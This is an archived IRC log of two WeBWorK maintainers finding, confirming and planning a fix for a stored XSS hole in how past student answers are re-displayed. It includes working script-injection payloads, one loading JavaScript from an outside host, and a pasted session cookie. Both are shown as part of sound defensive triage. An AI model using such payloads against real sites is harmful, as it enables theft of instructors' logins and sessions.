IRC log for #webwork, 2013-04-30

All times shown according to UTC.

Time Nick Message
08:18 ilbot_bck joined #webwork
08:18 Topic for #webwork is now WeBWorK (http://webwork.maa.org) is an open-source online homework system for math and sciences courses. WeBWorK is supported by the MAA and the NSF. | Release notes: http://goo.gl/Ry5HN | Channel logged at http://goo.gl/jELTn
12:08 mgage joined #webwork
13:16 goehle joined #webwork
14:01 aubreyja joined #webwork
14:18 Paul_Pearson joined #webwork
15:08 mgage joined #webwork
16:05 Paul_Pearson joined #webwork
16:24 goehle hey mgage
16:26 Paul_Pearson1 joined #webwork
16:53 rbeezer joined #webwork
17:42 mgage goehle: hi
17:42 goehle hey
17:43 mgage what's up?
17:43 goehle that bug that just came in is related to something I was dealing with earlier
17:43 mgage the authen bug?
17:43 goehle yeah
17:43 goehle I was getting authen errors the first visit to the login page
17:44 mgage haven't had a chance to look at it directly -- are these errors where the cookie and the session key have different values?
17:44 goehle No
17:44 goehle When external authentication is enabled
17:44 goehle when I visited the login page for a course for the first time
17:44 goehle I was getting an authentication error
17:44 goehle (before any authentication had even been submitted.)
17:45 goehle I changed the conditionals to fix that, but I don't think it was the right fix.  You eventually changed those conditionals to something else.
17:46 goehle https://github.com/goehle/webwork2/commits/master/lib/WeBWorK/Authen.pm
17:47 mgage ok -- that's not the error in the bug report -- that error is around line 235
17:48 goehle they aren't the same?
17:48 mgage no
17:49 mgage the fix I made in line 150 just added necessary parens for the defined() function.  I think the original clause was always false.
17:49 goehle hmm
17:50 goehle ok in my August 20th commit I made a stab at fixing my issue
17:50 goehle https://github.com/goehle/webwork2/commit/7f039c033d7a247b96cda9dc3d3950bebe7180ea
17:50 mgage the bug report error looks like it is just changing the error message to something more sensible
17:50 goehle which is changing the 235 entry
17:50 goehle Isn't the bug report about the authentication module suppressing the errors of the external authentication?
17:51 goehle (the error message stuff was kind of an addendum)
17:51 goehle Then in your August 28 commit you made a better fix
17:51 goehle https://github.com/goehle/webwork2/commit/e3a1c34f18f555761164cf09bf7bc30383eda975
17:53 goehle And that's the one pointed out in the bug report
17:53 goehle mostly I just wanted to let you know that may be the source of this particular bug
17:55 mgage ok -- I'll have to look at it later -- Nabor is right that it is overwriting the original error -- I think in an attempt to give a friendlier message.
17:55 mgage do you know about "blame"? https://github.com/goehle/webwork2/blame/e3a1c34f18f555761164cf09bf7bc30383eda975/lib/WeBWorK/Authen.pm
17:56 goehle oh that's a way easier way of looking at it
17:56 goehle how do you get to that?
17:56 mgage start looking at files -- then blame appears in the upper right above the files
17:57 goehle I see
17:58 goehle oh interesting
17:58 goehle that's telling you what commit each line came from
17:58 goehle ok
17:58 goehle so the commit for the lines in question came from your commit
17:58 goehle but your commit was in response to my earlier commit
17:59 mgage actually from wheeler I think
17:59 mgage probably depends on which version you are looking at -- I
17:59 goehle wait maybe I dont understand
17:59 mgage I'm looking at your repo
18:00 goehle is the accidental suppression caused by the conditional on line 235
18:00 goehle or the conditional on line 237?
18:00 mgage both -- and it may be a suppression of the error message to prevent XSS
18:01 goehle oh wait, I think I was misunderstanding
18:01 goehle so the bug isn't that there is no error report being generated
18:01 goehle it's that he wants the error report (which is being generated correctly) to include the output from the external authenticator
18:02 mgage the original error is replaced by this generic message
18:02 goehle could you really do xss that way?
18:02 mgage yes -- we had all kinds of examples of that which we got rid of -- there are probably still many left
18:03 goehle how do you even insert the script?  would you need control over the authenticator?
18:03 mgage no you just send something that creates an error -- then if the error message includes the code that caused the error it is returned and inserted into the viewers browser
18:04 goehle wouldn't that only cause you to xss yourself though?
18:04 mgage no -- you place the link on an open website and then the unsuspecting person clicks on it
18:05 goehle so it would be a webwork link, with the malicious authentication credentials included as part of the html code
18:05 mgage yes
18:06 goehle devious.  Although if you are getting people to click on links then you could send them directly to the site hosting the malicious script
18:06 goehle anyway, this has been super informative, if not particularly helpful for you :)
18:06 mgage np
18:36 goehle this xss talk inspired me to check some stuff out
18:36 goehle what should I do about a hole I found?
18:36 goehle fix it I suppose
18:36 goehle but what should I use as my base, and where should I submit it?
18:42 Paul_Pearson joined #webwork
18:42 mgage if it's a hot fix for master -- pull a fresh copy of the master branch from openwebwork/webwork2, patch it and submit it.
18:42 goehle so the issue is with the fact that we repopulate the text fields with the past answers.  if the past answer has html then that gets rendered
18:43 goehle does this qualify as a hotfix?
18:43 mgage if it's less urgent then pull from  release/2.7 and do the same.
18:43 goehle my friend colin was telling me how I could use this to steal professor login credentials from any professor who viewed the page (like via an email professor link)
18:43 mgage no -- that isn't even an issue in 2.6 I don't think -- essayQuestions start in 2.7
18:44 goehle this is for any question
18:44 goehle not just essay questions
18:45 mgage ok -- this is another javaScript injection technique I think.  -- if you are sure about it -- then it's probably a 2.6 hotfix.
18:45 mgage the solution is some kind of htmlEscape for past answers I would guess.
18:46 goehle eh well lets confirm
18:46 goehle go to a webwork page
18:46 goehle and plug
18:46 goehle "><script type="javascript">alert('foo')</script>
18:46 goehle into an answer
18:47 goehle now, chrome was preventing this from running in the console
18:47 goehle but it was definitelly getting rendered as js
18:47 goehle so a smarter attack should do something
18:48 goehle or try "><b>HI</b>
18:48 goehle the HI gets rendered in bold
18:49 mgage I haven't been able to get this actually run javaScript in safari yet -- funny things do happen with the HTML however
18:49 goehle yeah, I haven't been able to get it to run in chrome
18:50 goehle I get errors that look like
18:50 goehle "><b>HI</b>
18:50 goehle Refused to execute a JavaScript script. Source code of script found within request.
18:50 mgage he is right however that there is a potential hole in that practice.  the difficulty will be escaping it without causing errors in the math
18:50 goehle does that matter?
18:50 goehle so if you submit that
18:51 goehle it gets recorded as a past answer
18:51 goehle even if its completely wrong
18:51 goehle then you hit email instructor
18:51 goehle and when they view the page the answer gets plugged into the text box
19:00 mgage I haven't been able to get it to execute in any browser -- it's trapped by the parser   -- it does repeat back the input unescaped however -- which is a potential weak point.
19:03 goehle ok
19:03 goehle try this
19:03 goehle go to firefox
19:04 goehle (chrome is too smart for me to break)
19:04 goehle "><script src="http://agora.cs.wcu.edu/~goehle/test.js"></script>
19:04 goehle plug that in for any answer
19:06 mgage I get "unexpected character "   errors.
19:07 goehle sure
19:07 goehle but did you get a popup
19:07 mgage no
19:07 goehle hmm
19:07 goehle I did
19:07 goehle which course/version are you using
19:08 mgage I've tried several -- but I'm on ww_version 2.7
19:08 goehle try it on my hosted 2 page
19:08 goehle course
19:09 mgage https://hosted2.webwork.rochester.edu/webwork2/goehle_course/Calculus_I/1/
19:10 mgage I do get the error message about running javaScript on chrome
19:10 goehle I'm getting a hash reference  error?
19:10 goehle nm
19:11 mgage ok -- I have it giving a pop up on firefox now
19:11 goehle yeah
19:11 goehle and the chrome thing is chrome being super smart
19:11 goehle it does a lot of proactive stuff in terms of xss
19:14 mgage yes -- I can't get the alert message to fail on firefox -- I can get the source read from your test.js file
19:15 goehle huh?
19:15 goehle cant get it to fail?
19:15 mgage it reads a cookie:  WeBWorKCourseAuthen.goehle_course=gage%095iZ37ZkbwGxhHYXZtMQxIa3tL8u045st%091367349122; WeBWorKCourseAuthen.gage_demo=gage%09U5vaAJHSfr7dAGkjAfUr6UxPqgZ3CCM1%091367349281; __utma=29573820.694403147.1363193985.1363193985.1363193985.1; __utmz=29573820.1363193985.1.1.utmccn=(organic)|utmcsr=google|utmctr=|utmcmd=organic
19:15 goehle right
19:15 goehle yeah
19:15 goehle so the js could send that cookie somewhere else
19:15 mgage but the alert isn't firing
19:15 mgage yes
19:16 goehle sorry, I'm confused again.   What do you mean the alert isn't firing?  That text above looks like the output of the alert
19:16 mgage but "><script type="javascript">alert('foo')</script>   doesn't bring up a popup
19:16 goehle ah yeah
19:17 goehle that's because firefox also does some basic xss filtering
19:17 goehle it doesn't let you define scripts in the source of the page
19:17 goehle but its fine if you pull the script from somewhere else
19:17 mgage this is definitely a hole -- the problem is that we'll need to be careful about filtering because <  /  and so forth are used in math equations
19:18 goehle actually scratch that
19:18 mgage didn't see a message in firefox -- does it appear in the firebug console?
19:18 goehle "><script>alert('foo')</script>
19:18 goehle works for me
19:18 mgage in the first answer to https://hosted2.webwork.rochester.edu/webwork2/goehle_course/Calculus_I/1/  ?
19:19 goehle actually that link gives me a webwork error
19:20 goehle ah
19:20 goehle that set wasn't assigned to me
19:20 goehle yup
19:20 goehle I do get a popup
19:20 goehle try to act as me
19:20 goehle and then just visit that problem
19:22 mgage ok -- I have the alert popping up for me as well now.
19:22 mgage nice catch -- I have to leave for a bit -- will your friends be coming to ann arbor?  there was some talk they wanted to help with database stuff
19:23 goehle one of them
19:23 goehle he wants to pay his own way though
19:23 goehle I'm going to spend some time in the next couple of weeks going over the database code
19:24 mgage ok.  sounds good -- I won't insist :-)
19:24 mgage we might have a free room for him at least
19:24 mgage ok -- I'll be back in a little bit
19:24 goehle kk
20:13 aubreyja joined #webwork
20:16 aubreyja left #webwork
20:29 goehle does anyone know when/why webwork decides to override the source path of the problem for individual students?
21:01 mgage_ joined #webwork
21:05 goehle hey mgag_
21:05 goehle mgage_
21:06 mgage_ hi
21:06 goehle do you know why/when webwork decides to override the source path of a problem for individual students?
21:06 goehle I needed to change a problem that was broken (which means I had to change the source to a local version) and a bunch of students were stuck with the original
21:07 mgage_ not precisely -- but it's set up in ProblemDetails.pm
21:07 goehle ok, I'll take a look
21:07 goehle and you said > and < were necessary for answer input?
21:07 mgage_ I seem to remember that that can happen if they were logged in when you made the change -- I don't think I ever tracked that down
21:08 mgage_ well   3 < x  and x< 5 is a legal answer for intervals
21:08 goehle ah sure
21:09 mgage_ take a look through perl modules and see what the standard is for escaping HTML these days -- there are a bunch of hand coded versions in our current code --- Davide tends to like to roll his own, and I have done this from time to time myself -- it makes me nervous however -- it seems that a uniform approach to this would be safer.
21:10 goehle well I took a shot at it
21:10 goehle what I've got now is that
21:10 goehle just before the pg is evaluated
21:10 goehle I have html::scrubber run through all of the form fields and remove scripts
21:10 goehle although that may be too much
21:10 goehle which form fields can have answers in them?
21:11 mgage_ What I would do for starters is to make sure that anything being printed back to the screen (e.g. in the preview and answer windows) is run through an htmlEscape routine.  I think that might be enough to fix this particular exploit.
21:11 mgage_ the MathObject parser can take care of itself
21:11 goehle the issue is that the problem isn't with the html being provided by Problem.pm
21:11 goehle the issue is with the html being provided by PG.pm
21:12 goehle I was thinking that we should run some sort of scrubber before the answers even get into the system
21:12 mgage_ so are we sure about this? -- because as far as I could see the answers in preview weren't escaped either
21:13 mgage_ if you run the scrubber first you have the problem of handling < in inequalities
21:13 goehle thats not so bad
21:13 goehle scrubber just replaces those with &lt;
21:13 goehle and &gt;
21:14 goehle I can just put them back
21:14 goehle as far as where
21:14 goehle it looks like there are 3 places
21:15 mgage_ yes that seems to be the kind of thing we'll have to do
21:15 goehle where the script might be turned into valid html
21:15 goehle the first is in the answer preview (in the entered box)
21:16 mgage_ that should definitely be scrubbed -- there is no reason not to do that -- not 100% sure what to do with the script included in tooltips -- that might be safe.
21:16 goehle the second is hijacking itself into the value attribute of the AnSwEr input
21:16 goehle and the third is hijacking itself into the value attribute of the previous_AnSwEr input
21:16 goehle and as far as I can tell those last two are generated by pg
21:16 mgage_ probably scrubbing things before they are put into past answers is ok
21:17 goehle now this isn't past_answer past answers
21:17 mgage_ they are generated in pg in PGbasicmacros.pl
21:17 goehle ok
21:18 mgage_ we do store previous answers in a database to keep previous work sticky.
21:18 goehle well the most recent answer is being stored in problem->last_answer
21:18 mgage_ does html::scrubber have an unscrubber? (escapeHTML usually does) --
21:18 goehle not really
21:18 mgage_ actually I meant last_answer not past answers
21:19 goehle what html scrubber does is it removes tags
21:19 goehle so like if you scrub <script> suchandsuc </script>
21:19 goehle you end up with the empty tag
21:19 goehle do we ever input html as an answer?
21:19 mgage_ that might be a reason to use escapeHTML  -- the idea would be to make sure that anything being printed to a page -- including values in input boxes would be escaped.
21:20 mgage_ values from input boxes would be unescaped when being read into the parser and answer evaluators
21:20 mgage_ this seems pretty uniform -- and less likely to have unexpected loopholes
21:20 goehle what does escapeHTML do again?
21:20 mgage_ I can't remember any examples of html being input --
21:21 goehle it just turns html entities into character code right?
21:21 mgage_ it replaces things like < with &lt;
21:21 mgage_ or perhaps space into %20 -- there are a couple of versions -- the latter I think was used for url's -- I'm not sure what the state of the art is
21:22 mgage_ it's been a moving target over the years
21:23 goehle so you would use escapeHTML on everything before its displayed, rather than remove html from inputs before the are processed?
21:23 mgage_ it seems simpler
21:24 goehle I could be wrong (and I've done that a lot today) but it seems more complicated to me
21:24 mgage_ it's a straight encode decode routine    --
21:24 mgage_ some balance might be required
21:24 goehle ah I see
21:24 mgage_ html::scrubber seems to give you finer control
21:25 goehle yes, the encode/decode process is more straightforward
21:25 goehle I was just thinking that it would be better not to have these things floating around
21:25 goehle once you have <script> stuff stored in the db
21:25 mgage_ but I'm not sure we need that -- if someone wants to enter html into an answer a sanitized version will simply print back to them
21:25 goehle then you have to worry about when/how it gets displayed
21:25 goehle for example, I checked ShowAnswers.pm and ProblemGrader.pm and they are fine
21:25 goehle but who knows what else is rendering .pg code
21:26 goehle and all of that would be at risk
21:26 mgage_ well we haven't used the "taint" aspects of perl -- but they are there to help detect and debug this sort of thing.
21:26 goehle how so?
21:27 mgage_ it checks to see if a variable potentially has unsafe content -- based on where it is initialized
21:28 mgage_ brb
21:28 goehle kk
21:33 mgage_ CGI::escapeHTML  should be looked at
21:33 goehle yeah
21:33 mgage_ some of this is done automatically when CGI is used
21:33 goehle I'm still torn a bit
21:34 goehle I agree that we should escape characters before they get printed
21:35 goehle so that I should go through and fix Answer Preview
21:35 goehle and all of the stuff in PGbasicmacros.pl
21:35 goehle but I am not super convinced that we should be allowing html tags in stored answers
21:35 mgage_ that's a good place to start -- then let's test and see what else is needed
21:36 mgage_ I think we should also use escapeHTML before anything is stored.
21:36 goehle but why not remove the offending tags altogether?
21:37 mgage_ mostly a principle of least action -- at least initially
21:38 mgage_ removing all tags is a bigger change and I don't think I've thought through the consequences yet.
21:38 goehle what about some tags?
21:39 goehle so html scrubber can allow a lot of things and just remove script tags and other bad ones
21:39 goehle I really cant think of a legitimate reason for having script tags in your answer
21:39 goehle (keep in mind this is in the submitted answer.   Once it gets rendered it will have scripts in it for mathjax and whatnot)
21:41 mgage_ <x | y>  for physics?
21:43 goehle sure,
21:43 goehle I'm thinking more of a blacklist than a whitelist
21:43 goehle so allow any tags
21:43 goehle but remove
21:43 goehle script, html comments, process instructions, php
21:44 goehle maybe style
21:44 mgage_ well -- I don't think a black list will do any harm -- and it could help to have it in place in case we want to selectively remove certain tags.  -- at the moment I can't see them doing harm and I can't predict which things might actually be desirable eventually
21:46 mgage_ http://www.w3.org/Security/Faq/
21:46 goehle thats quite a read
21:47 goehle hmm
21:48 goehle I guess from a security standpoint its a bit of risk vs reward
21:50 goehle if you allow html tags in the stored answers then they could very well be rendered.  Any custom PG evaluator that doesn't use escapeHTML, for example, would render them
21:50 goehle but if you remove too much then you restrict peoples ability to do answers
21:50 goehle and PG is a complicated beast
21:50 goehle there is a lot going on there
21:51 mgage_ yes -- and its minimal assumption that a student answer is just a string has been very valuable in creating new answer evaluators.
21:51 goehle well student answer would still be a string
21:51 goehle it would be a string that didn't contain any html though
21:51 goehle still, I see where you are coming from
21:52 mgage_ so I'm inclined to be cautious about making restrictions.  if the html tags are escaped there is a reasonable chance they won't do damage -- although they might cause errors
21:52 mgage_ let's escapeHTML first -- and then see where we are.
21:53 goehle can I at least remove script and the other super bad ones?  It's hard to see what kind of problem could possibly be so awesome as to be worth allowing students to submit scripts as their answers
21:55 mgage_ sure -- go ahead -- it will be useful to have the html::scrubber technology in place -- and for the essayQuestions the protection will only get more complicated
21:55 goehle yeah, I may loosen Scrubber for essay questions
21:56 goehle based on what you said
23:33 goehle_ joined #webwork
23:33 goehle_ hey mgage, got time for another question :)